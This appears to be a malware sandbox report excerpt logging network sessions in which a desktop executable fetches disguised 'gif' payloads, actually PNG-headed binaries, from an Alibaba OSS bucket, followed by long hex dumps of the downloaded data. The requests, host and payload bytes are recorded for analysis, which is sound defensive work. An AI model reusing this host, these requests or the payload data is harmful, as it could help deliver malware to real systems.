2025-01-02 11:14:09 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 5f 58 dd 1d c6 90 d1 17 9e 99 14 9f 9f e8 24 70 eb ab e0 64 64 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 fd 3f eb 9c b1 ed f3 3f 51 9e f7 4d c4 05 d1 c5 c5 8e 4c 31 81 43 ca 47 17 86 4c 11 d9 3a 49 f3 d5 d6 21 1b d8 ae d6 66 c5 de df e0 a9 69 2c 0c cd ed e7 e8 a1 61 b7 c8 dd a6 64 37 b9 71 37 d4 aa 35 3b 34 35 36 37 30 31 32 33 cc cd ce cf c8 4d 8b 02 89 1b 0b 0b 44 84 0f 47 93 d0 1a fa 4d 32 16 17 d4 d5 d6 d7 d0 d1 d2 d3 ec ed ee ef e8 6d ab 22 b9 a1 2b 2b 64 ea 6f 3f 30 31 32 33 7c bc 77 3f 70 b4 3f dd 2e 3c 3e 77 c9 40 0a c8 85 86 8a 8b 84 85 86 87 80 81 82 83 9c 9d 9e 9f 98 1d d5 bb 10 11 d7 17 78 7d b6 9d 9f 9e 9d 2b e9 70 7d c1 69 69 22 e6 20 49 4e 87 11 59 72 73 b8 35 25 3f fb 95 5a 33 f7 a4 36 f4 42 c9 0f 8e 81 97 87 87 87 de 4a c3 01 de 86 c7 19 9a Data Ascii: _X$pdddefg`abc\|}~x??QML1CGL:I!fi,ad7q75;45670123MDGM2m"++do?0123\|w?p?.<>w@x}+p}ii" INYrs5%?Z36BJ
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 6d 6b 6a 06 df 1b 5d a2 58 50 d5 1d 73 88 18 aa a3 a4 a5 4e a1 a8 a9 aa 3b e4 2e 6a 87 73 38 fe 97 bc fd 35 5b 90 00 ad bb bc bd 41 aa f1 c1 c3 c3 41 05 b2 cf 43 8d ee fb 47 05 03 e6 98 5c df bd 6f d4 d6 3f ad d9 da db 94 56 9a fb c8 a9 6b e6 b1 59 e7 e7 a0 64 ae cf c4 a5 6d 2f f8 b9 7b f6 11 4e f7 f7 b0 72 ff c5 40 fc fe b7 89 04 ad b9 05 05 c1 02 9d b3 0b 0b 05 09 0e cf d7 14 9d a9 15 15 17 17 18 19 dd 1e 85 a7 1f 1f 21 21 22 23 9c 2d 26 27 28 61 41 eb 2c 65 a3 22 a1 8b 33 33 bf 61 12 07 70 b0 2e 3a 74 b0 33 f5 42 40 42 ab 09 bb b9 b8 d8 01 c9 8f 64 8e 82 83 9c 19 db 0f 70 75 01 1f db b5 1a 13 d7 84 a1 4a 01 9e 62 63 2c ee dd 9f 68 69 6a 23 e1 39 4a 3f 38 fa bd 36 47 b5 89 62 29 86 7a 7b 34 f8 be 0b b2 c9 01 e7 a0 bd 86 cf 05 c5 ae d3 c4 06 da ab c0 dd Data Ascii: mkj]XPsN;.js85[AACG\o?VkYdm/{Nr@!!"#-&'(aA,e"33ap.:t3B@BdpuJbc,hij#9J?86Gb)z{4
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 4b 9b bd e2 b3 b8 d1 11 54 fa 92 e1 ef 78 e4 29 53 97 53 4e e5 ab a9 aa ef 27 a2 9d 7d f5 34 7b bc 30 77 b6 b7 b8 f5 31 fc b4 f1 33 aa 41 0e 3d 3c 8c 4e 81 df 43 02 8e f0 3c b1 d5 87 11 39 f2 97 ef 25 a9 c5 5d 10 51 01 57 2f d1 9b 39 68 be c7 cc ea ce 93 cc c9 ab e4 5a e5 11 2d 73 10 fd b9 fb 4b 72 e6 f8 dd fb fb be 77 72 ee 10 25 03 03 48 2e c6 46 83 49 f6 d8 e4 41 87 48 18 98 55 0b 55 1a a0 1f 9b f8 15 51 13 a3 9a 0e 20 05 23 23 66 af aa 36 38 0d 2b 2b 60 06 ee 6e bb 71 ce e0 dc 79 bf 70 30 b0 7d 27 7d 32 88 37 c3 a0 4d 09 4b fb c2 56 48 6d 4b 4b 0e c7 c2 5e 40 75 53 53 18 7e 96 16 d3 19 a6 88 b4 11 d7 18 68 e8 25 43 25 ee 66 2e eb a9 6e 27 e5 2a 66 e6 37 55 33 48 a5 7a f3 3e 87 86 85 84 ba 1b 71 00 f4 a5 c2 cb 09 d1 a2 c7 01 fd ae b3 c4 06 41 67 c9 93 Data Ascii: KTx)SSN'}4{0w13A=<NC<9%]QW/9hZ-sKrwr%H.FIAHUUQ ##f68++`nqyp0}'}27MKVHmKK^@uSS~h%C%f.n'*f7U3Hz>qAg
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: d1 84 d1 1d 87 d9 96 2c 92 1f 7c 91 d5 af 1f 26 92 a4 81 a7 a7 ea 23 26 9a bc 89 af af fc 9a 7a f2 3f f4 4a 64 50 ba 4a 30 7a f4 bd 7d 88 c2 05 8b ff 1d b4 ec 89 c6 7c c2 8d 32 0e 4c 31 de 98 dc 6a 51 e7 d7 fc d8 da 99 56 51 ef cf c4 e0 e2 af cf 2d a7 6c b9 15 39 01 13 27 ab d4 33 83 57 b6 71 35 f9 b3 2d 72 38 10 fe 76 3b b7 8b 5d 26 13 4c 8e 6a 23 10 41 81 7f 28 2d 46 84 6c 35 3a 52 4a d6 da db d4 51 93 47 38 15 56 96 54 05 32 6b ad 59 02 3f 69 7c 6b 7d 6d 7a 66 ac dc 01 7f b8 c5 7c bd ef 70 b2 c8 77 b7 d4 0d c0 01 78 3a 47 30 4a 0b 24 30 4d a2 b9 b8 b2 b1 06 dd 45 55 b8 52 1d dd 80 1c d2 a5 13 d9 8f 51 db 17 60 62 63 21 e0 99 13 79 81 b9 9f 93 92 26 e4 b8 39 11 30 70 3d 75 bf 93 7a 32 f0 b3 3d 46 06 90 8e 06 d7 85 85 86 be f3 81 ff 83 b5 b6 81 02 d7 90 Data Ascii: ,\|&#&z?JdPJ0z}\|2L1jQVQ-l9'3Wq5-r8v;]&Lj#A(-Fl5:RJQG8VT2kY?i\|k}mzf\|pwx:G0J$0MEURQ`bc!y&90p=uz2=F
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 1a f0 b1 a6 df 11 dd be b3 d0 14 ea bb 80 49 6d 55 5b 5a ea 2c d5 29 e7 20 eb a5 e6 22 a5 21 1d 4c 4b f4 b9 01 b0 3a 5b b4 f4 b2 00 3b d1 c1 e6 c2 c4 4f 4a d6 d8 ed cb cb 80 e6 0e 8e 5b 91 2e 00 3c 98 5f 90 d0 98 53 9c c4 9c d1 69 e8 62 03 ec ac ea 58 63 f9 e9 ce ea ec 67 62 fe e0 d5 f3 f3 b8 de 36 b6 73 b9 06 28 14 b0 77 b8 08 40 8b 44 18 44 09 b1 00 8a eb 04 44 02 b0 8b 01 11 36 12 14 9f 9a 06 08 3d 1b 1b 50 36 de 5e ab 61 de f0 cc ae 6a 03 40 68 a3 6c 0c d2 ef 62 b9 76 3a 7a b9 75 32 76 b3 29 73 b2 7b 35 7f b6 17 65 cb 0f 60 2d 7d 0a 88 46 c8 5a b2 b2 b1 0e a6 57 12 27 05 1c dd 81 10 d2 94 b3 69 81 a1 a0 e4 a1 6d e7 f0 65 66 67 83 55 e9 16 9c 6d 18 59 f0 cc 8a 73 74 75 76 78 fd ee 7a 7b 7c f6 fb 7f 81 81 82 cf 0f 4b ca 0e ec ad b2 c6 07 48 07 cb b4 a1 Data Ascii: ImU[Z,) "!LK:[;OJ[.<_SibXcgb6s(w@DDD6=P6^aj@hlbv:zu2v)s{5e`-}FZW'imefgUmYstuvxz{\|KH
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 52 57 d5 c5 df 1b 75 ba d3 17 44 d6 14 62 e9 2f ae 41 67 a6 a7 a7 fe 6a e3 25 a6 e6 22 e3 b9 fa 3e fc bd b9 a6 ba 51 99 6c 43 42 f6 32 c5 29 06 c3 c4 8d 4f c4 80 42 09 83 4f 09 ee 94 13 99 51 b2 c4 d5 9e 5a dd 39 1e db dc 95 57 9e e8 a9 6f e6 21 21 e6 e7 a0 60 eb a3 67 2c 2d 23 3c b1 a1 a5 a3 b4 a2 b6 ad b8 ac ba ab b5 7d 13 70 49 89 fa 41 36 f9 43 81 75 2e 2b 48 2c b2 2b a0 11 12 13 58 34 6a 33 30 55 3b a7 38 d5 1e 1f 20 c9 85 ff db da 6a ac 40 01 66 a2 40 09 6e c7 a9 ed cd cc 7c be 76 17 70 b0 be 1f fc 3d 3e 3f 08 ca 35 13 0c cc f2 63 f0 49 4a 4b 04 c6 09 07 18 d8 16 77 64 1d dd 08 18 11 d1 1c 6c 15 d7 1b 44 29 2e e8 13 4d 2a ee 1c 4d 3a 23 e7 a6 86 29 7f 71 72 9b 21 a9 89 88 30 f0 0a 5b 94 31 a2 80 7f c9 0b db ac 6d c5 5b 77 76 c2 00 dc ad c6 04 c2 b9 Data Ascii: RWuDb/Agj%">QlCB2)OBOQZ9Wo!!`g,-#<}pIA6Cu.+H,+X4j30U;8 j@f@n\|vp=>?5cIJKwdlD).M*M:#)qr!0[1m[wv
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 83 dd 52 57 b7 9d 0a 83 72 99 9d 9e 9f 6c 6d 6e 6f 68 66 6a 6b 64 65 66 67 60 61 62 63 7c 7d 7e 7f 78 76 7a 7b 74 f1 31 be a9 0f be bf 88 4c d7 ad 73 3a 39 8f f3 0b be e8 a9 85 45 cb f5 e1 d2 d3 d4 9d 5d 5e 40 d9 da db 94 e6 96 cf 92 e7 aa d8 ac ed 90 e0 51 e4 ea eb ec 20 c7 2c 3c b1 a1 bb 77 19 d6 c4 23 b1 77 ee 81 8c ff ff 45 32 c2 4b 89 09 9d 4f 85 05 c0 b1 ac 02 0e 0f f8 c9 10 13 14 90 d6 63 09 e6 1f 9d 6d 1c 1e e0 e3 a2 d9 22 56 f6 96 26 c3 2e c2 21 2c 2d 2e 1d f0 79 b1 f7 14 6e f5 fb f4 79 69 73 bf d1 1e b4 5d 21 33 42 44 ae 5b 0f c5 4c 65 3a 4d 4d b1 84 18 dc 5e c8 1c d8 5a 9f a7 4c 4d eb 5c 5d a1 52 21 10 63 63 e1 be 13 b8 d8 68 22 e8 a8 4d 35 ac bc 39 fb 2f 50 7d 3e fe 14 5d 6a 33 f5 09 5a 67 d7 c0 d6 c2 d1 c4 d0 c6 df c1 09 67 ac 06 77 c3 1d ac Data Ascii: RWrlmnohfjkdefg`abc\|}~xvz{t1Ls:9E]^@Q ,<w#wE2KOcm"V&.!,-.ynyis]!3BD[Le:MM^ZLM\]R!cch"M59/P}>]j3Zggw
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 94 1c 96 de 68 5b d0 17 e4 9e dd 1a 69 d4 bd e2 27 49 d0 0c e7 28 57 8a df aa ed 2e 51 b9 c4 2c fb 31 6e c2 be 7e fa 45 bb 57 be f6 40 0f 81 f0 35 4e c2 42 07 c7 4d 1c cb cc cd f2 ef a4 d5 ee da a1 d2 9e 28 1f 53 dd 30 2d 59 1e d0 64 5e e2 e3 e4 a8 63 11 9c ee a3 62 f2 a4 6d 29 f8 b8 0d b6 f4 4f f7 f7 f8 f9 c9 3b 17 f8 b6 00 c7 fe c2 89 0b 85 ff 5b 7c fd 8a f2 2e 78 3f 8b d2 64 0a 53 90 e3 62 1d 20 56 1b 6e 19 55 e1 d8 cb 28 11 f1 64 a1 d0 67 27 bd ec fa c4 c6 3f d0 f8 79 b7 e8 40 33 f0 34 64 71 c5 f8 75 c2 3a 1b c5 81 37 a8 ce 42 c2 87 3c 0f 0a cf ba 38 46 73 70 25 6f 6f 5d 21 6f d2 8a 2d 77 13 d9 86 2a 5a e8 62 2a 9c a7 6a d8 68 80 99 59 6b 6c e8 ae 1b 63 38 8d 77 50 3d 89 b0 30 fc a1 0f 7b f7 79 f7 83 c9 7d 40 cd 7a 82 a3 c0 76 4d 62 e9 72 71 70 d8 14 Data Ascii: h[i'I(W.Q,1n~EW@5NBM(S0-Yd^cbm)O;[\|.x?dSb VnU(dg'?y@34dqu:7B<8Fsp%oo]!o-wZbjhYklc8wP=0{y}@zvMbrqp
2025-01-02 11:14:09 UTC	4096	IN	Data Raw: 9b dc 16 6d 8f ed 48 d2 10 91 71 cd 9e a0 49 dd 58 5b 5a ee 24 8d 76 f9 aa ac ad e6 2c 74 91 e9 70 78 fd 35 76 88 f1 45 9e 19 2d be bf 0c 89 41 02 f4 8d 39 e2 69 59 ca cb 00 85 47 93 f4 d9 9e 5a 98 f1 f6 80 90 5a 36 fb 95 56 07 96 6b 19 69 e9 0c 8d ec e7 e8 79 a2 60 eb a5 65 e7 b8 7a 73 7b f4 f5 f6 07 07 f9 71 f0 14 59 f4 ff 00 49 89 5f 20 35 4e 84 cc 29 55 c8 c0 45 87 53 34 19 5e 9a 58 31 36 40 50 9a f6 3b 55 96 c7 56 ab d9 a9 29 cc 0d 2c 27 28 b9 62 a0 23 1e fc 67 bb 38 da 95 36 35 36 a7 b3 32 d2 5d 36 3d 3e 77 cb 1d 66 73 0c c6 82 67 17 8a 86 87 80 05 c7 13 74 59 1e da 18 71 76 00 10 da b6 7b 15 d6 87 16 eb 99 e9 69 8c 8d 6f 67 68 f9 22 e0 2b 65 26 e4 60 39 f9 7c 3c fe 64 3f f3 70 92 25 7e 7d 7e ef 0b 8a 6a 9d 8e 85 86 cf 03 d5 ae bb c4 0e 4a af cf 52 Data Ascii: mHqIX[Z$v,tpx5vE-A9iYGZZ6Vkiy`ezs{qYI_ 5N)UES4^X16@P;UV),'(b#g86562]6=>wfsgtYqv{iogh"+e&`9\|<d?p%~}~jJR

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49983	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:11 UTC	111	OUT	GET /c.gif HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:11 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:11 GMT Content-Type: image/gif Content-Length: 10681 Connection: close x-oss-request-id: 67767503998B3E35303A286F Accept-Ranges: bytes ETag: "10A818386411EE834D99AE6B7B68BE71" Last-Modified: Thu, 02 Jan 2025 10:14:13 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 10287299869673359293 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: EKgYOGQR7oNNma5re2i+cQ== x-oss-server-time: 18
2025-01-02 11:14:11 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-02 11:14:11 UTC	4096	IN	Data Raw: 4d cf 62 ff 5a 3f 30 31 3a fe ee 75 37 8a ba 5b 85 e1 ec 6b 35 10 78 f6 6d 36 3d 23 d2 d0 cd ab db f8 37 32 1f 37 11 bf 96 19 b0 c6 be a6 a0 ee eb 24 5d 48 ae 73 f3 f5 c5 94 b0 70 dd c6 5c 11 f5 e3 28 66 41 36 66 ef 88 eb 8b 2d 92 d1 9e 9a 8e 78 c0 74 34 67 7b b1 f3 fc 59 49 81 89 f5 cf 42 a2 b8 b8 7a d9 bb 7f 45 04 62 02 52 34 b9 0e 45 7f ce ff c3 12 7c ec ed 9c 64 e7 85 d4 e8 6d e9 e8 2d c8 3d 69 6a 0d 66 e5 c2 e6 27 9e d7 9e 98 68 92 43 fb c4 05 18 16 a9 a8 72 cc e5 66 13 b1 0c 24 22 dc 23 42 b1 c5 b3 c5 9f fd f3 d6 88 82 8e d7 81 8f 50 ee 36 68 55 e9 6b 5a ae a1 ec ca 4e e8 e9 82 52 74 0c 38 e0 2c 9b 17 6f 51 cf 4d 52 2a df 70 1d 00 4d 53 4a 65 f0 2f 99 7a fa 82 f9 0c fb 20 75 c3 54 ed 1d 83 3b 0b af 29 d0 11 b9 47 4d 64 2c b9 73 9e 4e 8d b6 ee f3 66 Data Ascii: MbZ?01:u7[k5xm6=#727$]Hsp\(fA6f-xt4g{YIBzEbR4E\|dm-=ijf'hCrf$"#BP6hUkZNRt8,oQMR*pMSJe/z uT;)GMd,sNf
2025-01-02 11:14:11 UTC	3035	IN	Data Raw: 0f 4c 5d 7f 79 25 b9 af f5 fa ff 2d d5 2f 9e 63 5a b4 eb 3c f8 2b dc 07 58 64 ef 7d 5f 68 f0 fa 8a e5 34 38 ff db ca a6 fb c5 61 06 c2 2a ef f0 07 da ad 1f 37 88 9e 3f 37 39 3a 64 4f 74 4c 1c 4f ed 8c 04 e8 32 2f 75 52 85 d3 c1 84 aa 26 20 b4 ef d2 50 e0 65 aa 59 8a eb 7f 04 7f cb 20 fc 09 65 90 40 b9 6c 83 0b ea fe ae a2 b0 2a 83 e0 55 8e c7 4f 10 9c 2e 0c 87 d5 7f 34 18 a1 4d 99 78 06 2b 80 c4 6e 0a 78 03 f4 c4 a6 5d 85 aa fc ce ec 05 9f 47 96 b7 e0 d0 c3 4d 07 1c 93 32 b7 41 1d f1 42 ea c2 af 1c 76 47 ce 69 21 ab b9 ca b8 0d 8c 28 8a f0 3e 70 0a d6 52 7a b0 e5 4d 54 5e 49 25 92 dc fe f8 6f c3 6a 72 b7 08 1a 6f 03 1f b2 0c dc f0 35 6c 4f a9 29 7a c1 f4 63 78 16 6c d9 94 34 46 75 19 48 f8 2d 56 35 df 65 55 d3 05 98 53 87 ae 10 a2 c3 46 bc c5 1c 6f 69 f0 Data Ascii: L]y%-/cZ<+Xd}_h48a7?79:dOtLO2/uR& PeY e@lUO.4Mx+nx]GM2ABvGi!(>pRzMT^I%ojro5lO)zcxl4FuH-V5eUSFoi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.6	49984	39.103.20.59	443	1656	C:\Users\user\Desktop\45631.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-02 11:14:12 UTC	111	OUT	GET /d.gif HTTP/1.1 User-Agent: GetData Host: ry2ihs.oss-cn-beijing.aliyuncs.com Cache-Control: no-cache
2025-01-02 11:14:13 UTC	546	IN	HTTP/1.1 200 OK Server: AliyunOSS Date: Thu, 02 Jan 2025 11:14:13 GMT Content-Type: image/gif Content-Length: 3892010 Connection: close x-oss-request-id: 67767505820F3F30373DA531 Accept-Ranges: bytes ETag: "E4E46F3980A9D799B1BD7FC408F488A3" Last-Modified: Thu, 02 Jan 2025 10:14:17 GMT x-oss-object-type: Normal x-oss-hash-crc64ecma: 3363616613234190325 x-oss-storage-class: Standard x-oss-ec: 0048-00000104 Content-Disposition: attachment x-oss-force-download: true Content-MD5: 5ORvOYCp15mxvX/ECPSIow== x-oss-server-time: 4
2025-01-02 11:14:13 UTC	3550	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 00 00 00 02 00 08 03 00 00 00 c3 a6 24 c8 00 00 01 da 50 4c 54 45 00 00 00 f7 cd 48 f0 d2 4b f5 cd 46 0f a5 f0 f7 ce 47 f7 cd 48 f7 cc 47 f7 cd 48 f7 cd 48 f5 cd 44 f6 ce 49 f6 cd 47 f6 cd 47 66 c9 46 66 c9 48 66 c9 46 66 ca 45 f6 cd 48 f6 cc 48 f7 cc 48 f6 cc 48 f6 cd 48 0f a0 eb 12 a2 ea f8 cd 48 11 a2 e9 10 a1 e9 f7 cd 48 f6 cd 47 10 a2 ea 11 a1 ea f6 cd 47 11 a2 eb 10 a1 ea 12 a1 e8 0f a5 e8 10 a2 ea 11 a2 e9 f6 cc 47 ff da 48 11 a1 e9 11 a2 e9 00 99 ff 11 a1 e9 10 a2 ea 11 a1 e9 10 a3 ea 11 a1 e9 00 bf ff 00 aa ff 11 a2 e9 00 91 da 11 a0 e7 10 a2 ea 10 a1 e9 10 a2 eb 11 a1 e9 11 a2 ea 11 a1 e9 10 a2 e9 0f 9f ef 10 a2 e9 10 a2 ea 13 a6 eb 10 a1 ea 10 a1 e9 1f 9f df 11 a1 e9 11 a4 e8 10 a1 e9 10 Data Ascii: PNGIHDR$PLTEHKFGHGHHDIGGfFfHfFfEHHHHHHHGGGH
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 3b 9a 2f a5 d0 56 ab c4 f4 cc a1 12 27 f0 11 4c 94 ef 12 31 58 23 3c c6 b1 ec ba 45 96 46 46 f6 24 8e 89 dd b1 38 89 66 c2 79 d2 b3 b5 25 19 80 c7 28 f9 85 7d 8d 49 94 e3 d2 8b 92 cb f1 27 a5 1e 65 9a 0d 24 21 88 82 f8 05 e3 7e 27 2d b8 d1 e3 32 71 8d ad 95 6c 46 1c 3b d8 e9 eb 13 24 94 d8 16 f1 f4 38 83 ee f5 d4 be 1d b9 53 fa 70 d4 ee cc a4 15 79 67 9f 06 cb 07 19 b1 3e 7c b5 65 18 68 0a c6 22 13 ed 4c ea 2c ff 32 4f 94 a2 b5 94 ef ee d9 86 62 ff a7 83 cf f0 ea c9 44 53 4d 8a 6c 9b cc 06 f2 e6 13 fa 3c 21 8d f7 9f 32 cd 95 50 9a 71 01 f0 c6 0b dd 04 f0 5b 24 6b c6 6c 7f 35 67 68 4a 5b 2d df 32 af ed a0 7b 95 d7 43 07 d1 fb 17 0b 43 df 87 62 69 46 68 e0 eb 47 28 a3 81 aa 32 08 bc 21 f8 7a 14 93 1b c6 2c 1b 7d c3 10 5b d1 12 f7 56 c2 1c 7c e4 85 f3 c4 6f Data Ascii: ;/V'L1X#<EFF$8fy%(}I'e$!~'-2qlF;$8Spyg>\|eh"L,2ObDSMl<!2Pq[$kl5ghJ[-2{CCbiFhG(2!z,}[V\|o
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: a8 c4 d9 fd a7 56 28 73 5f 0f 7f 3b 00 66 82 36 d4 2f 7b 1c 50 0d 90 42 5e 0e b6 3d dc 83 58 6a 35 e0 f2 6f 3a a8 d5 ee 37 cd 99 ee 9c 06 8c d0 87 05 97 4d 50 36 97 03 25 ea e1 52 3c bb 3e 25 ca 4d a1 9a de 65 27 6e 38 2d 65 92 e5 96 84 ff 4a 69 e4 8b 0a 8b 94 f6 d4 7c 01 80 fb e0 03 ea 19 32 5d 29 28 3c ad 5d b5 fc 74 7f 9a bf fa 5f aa b3 08 b5 0d 57 25 c0 b8 67 cb 8c bc e8 48 4a 02 a5 57 78 65 40 ad c1 5a 91 f1 85 ed 06 07 63 d1 27 0a 48 fc b3 b0 df 6f a6 ee 6a 10 26 82 2e 2b 90 38 ca 76 a6 a6 73 fc a4 31 18 8b bd 07 98 fc 6b e9 ca cc 83 78 6a 94 92 3f 5d 02 57 0e 0c a9 36 a3 64 c6 b8 98 a5 03 28 be 9c a1 91 80 1b b7 e8 6f 73 1a dc 78 f5 54 c0 09 e3 53 1a 57 f1 88 1f f9 f7 41 dd c4 eb 74 19 ad 09 5d 4b c5 25 7f a9 10 ba 2e 1a 5c 79 23 15 00 2d cb 6f 11 Data Ascii: V(s_;f6/{PB^=Xj5o:7MP6%R<>%Me'n8-eJi\|2])(<]t_W%gHJWxe@Zc'Hoj&.+8vs1kxj?]W6d(osxTSWAt]K%.\y#-o
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 9b 9d 99 9d 9b 95 97 95 8b 8d 89 8d 8b b5 b7 b5 bb bd bf 2d db b5 b7 b1 8b 8d 8f 8d 8b 95 95 95 fb 9c 9f 9d 8b 95 97 95 8b 8d 8f 9d 8b f5 f7 f5 fb fd ff fd eb f5 f7 f5 8b 8d 8f 9d 8b 95 97 95 9b 9d 9f 9d 9b 95 87 95 8b 8d 8f 12 a4 b5 e6 b5 bb bd ff 4a 92 b5 3b b5 8b 8d 8f 0d eb 95 77 94 9b 9d df 82 fb 95 0f a8 8b 8d 8f 8d 8b 75 77 75 7b 7d 7f 1d 1b 75 47 60 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b b5 b7 b5 bb bd bf bd bb b5 b7 b5 8b 8d 8f 93 eb 95 d7 94 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f cd ae f5 7f f5 fb fd ff fd fb f5 f7 f5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d a1 f9 ee cd c3 b5 bb bd ef d4 ba b5 b7 a5 8b 8d 8f 8d 8b 95 97 95 9b 9d 9f 9d 9b 95 97 95 8b 8d 8f 8d 8b 75 57 75 7b 1d 51 0f 1f 14 03 14 8b 8d f9 36 8b 95 97 Data Ascii: -J;wuwu{}uG`uWu{Q6
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: 18 0b cc ef 77 23 0b dc 62 f5 92 bd ff f0 55 8b 71 aa 3a 3d 2b 0e e8 a2 e1 cd ea 57 ca 72 3f 3b a3 53 99 f3 19 2d 50 82 0e 0d 67 11 12 78 ff f7 c0 c2 9c d0 1f 35 b3 d6 c1 15 8b 71 1a 1f 9f 00 52 44 b6 6f bf 5c 42 7e 10 b4 79 e0 70 9b ec ea 3e 72 2b 74 62 9c c8 03 89 51 17 b4 ee 50 26 6c f4 04 88 dc ad 35 53 4d 06 b8 17 18 42 ac 5e c3 76 8a e3 0f 55 bd 10 fb 3f 3d a9 48 9d ea 3a a4 e2 a6 b4 3f 76 ce a4 1c 7c fb f9 82 7d fe 97 54 b4 b3 68 d2 ca 6b fa 63 cb 18 ff 4a 19 f9 7b ce a8 14 4b 2d e1 e4 ac ec 85 7b 1e 75 a1 29 ef 25 b4 c1 12 a6 c8 7c 21 bf 95 a2 cb d0 51 3b 62 af 3a aa cc 42 6d 00 8c 79 d0 be 06 b6 82 9f 76 84 17 1f 9e 9d b0 29 42 92 30 ee 02 cb 2e 78 cc a6 12 f0 07 e3 66 63 9f 49 05 39 61 2f 8e d5 7d 9a 70 87 1f c6 95 13 f3 f5 88 62 22 f4 1a 33 79 Data Ascii: w#bUq:=+Wr?;S-Pgx5qRDo\B~yp>r+tbQP&l5SMB^vU?=H:?v\|}ThkcJ{K-{u)%\|!Q;b:Bmyv)B0.xfcI9a/}pb"3y
2025-01-02 11:14:13 UTC	4096	IN	Data Raw: fc a8 65 45 fc 8d 05 fd fb b3 9f 14 a2 f6 f8 cc c4 eb 39 9d d3 a3 9f a0 42 0a 18 58 74 c7 69 1d eb 8b bf f8 0a 86 d0 b8 94 b7 61 b0 9e 73 a2 69 b3 40 d3 c4 61 59 75 53 34 0e c7 4a cf b1 8f a5 1c 40 ae d5 10 f9 b3 9d 63 52 15 9e 8b 52 f6 a8 f0 ad 49 d7 f7 72 8e 78 64 f5 39 5f 0b 52 de 78 1c 55 45 37 4b fa 52 4d 22 ef 1a 7a 2b 77 55 11 34 b8 02 76 4b bc 41 00 36 50 70 72 34 04 b2 fc fc b3 02 62 64 d3 fa df dd e5 b8 e2 bd 6c e5 a6 e2 23 8e 49 61 66 4b de 3e d6 1f 11 74 6a d1 49 c0 da 1e df 8c f9 36 8a 61 dc e3 8e c6 1a 21 61 99 12 00 4b bc 3f 2f 86 71 66 94 e7 b9 fd a5 2f a6 09 9c b6 7f c9 3c 7d 99 5e d8 fd f5 f6 1c ce 71 0e 